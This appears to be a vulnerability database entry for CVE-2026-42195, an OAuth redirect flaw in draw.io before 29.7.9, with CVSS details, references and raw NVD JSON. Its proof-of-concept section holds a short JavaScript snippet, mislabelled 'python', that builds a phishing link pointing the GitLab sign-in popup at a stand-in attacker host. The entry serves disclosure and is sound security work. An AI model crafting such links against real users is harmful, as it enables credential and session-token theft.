CVE-2026-42195

Description

draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.9, the draw.io client accepts a ?gitlab= URL parameter that overrides the GitLab server URL used during OAuth sign-in. A crafted link causes the user's click on draw.io's "Authorize in GitLab" dialog to open a popup on the attacker-controlled host instead of gitlab.com. This can lead to credential fishing and session state token exfiltration. This issue has been patched in version 29.7.9.

CVSS Details

CVSS Score

3.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

draw.io < 29.7.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept: Malicious URL generation
// The 'gitlab' parameter overrides the OAuth endpoint
const targetUrl = "https://app.diagrams.net/";
const attackerControlledHost = "https://evil.com/fake-gitlab";

// Construct the malicious link
const pocLink = `${targetUrl}?gitlab=${encodeURIComponent(attackerControlledHost)}`;

console.log("Send the following link to the victim:");
console.log(pocLink);
// When the victim clicks 'Authorize in GitLab', the popup will point to evil.com

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42195
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42195
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42195/
[4] VulDB https://vuldb.com/cve/CVE-2026-42195
[5] https://github.com/jgraph/drawio/issues/493
[6] https://github.com/jgraph/drawio/releases/tag/v29.7.9
[7] https://github.com/jgraph/drawio/security/advisories/GHSA-8x7j-m8px-7p8x

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42195", "sourceIdentifier": "[email protected]", "published": "2026-05-08T22:16:31.410", "lastModified": "2026-05-08T22:16:31.410", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.9, the draw.io client accepts a ?gitlab= URL parameter that overrides the GitLab server URL used during OAuth sign-in. A crafted link causes the user's click on draw.io's \"Authorize in GitLab\" dialog to open a popup on the attacker-controlled host instead of gitlab.com. This can lead to credential fishing and session state token exfiltration. This issue has been patched in version 29.7.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/jgraph/drawio/issues/493", "source": "[email protected]"}, {"url": "https://github.com/jgraph/drawio/releases/tag/v29.7.9", "source": "[email protected]"}, {"url": "https://github.com/jgraph/drawio/security/advisories/GHSA-8x7j-m8px-7p8x", "source": "[email protected]"}]}}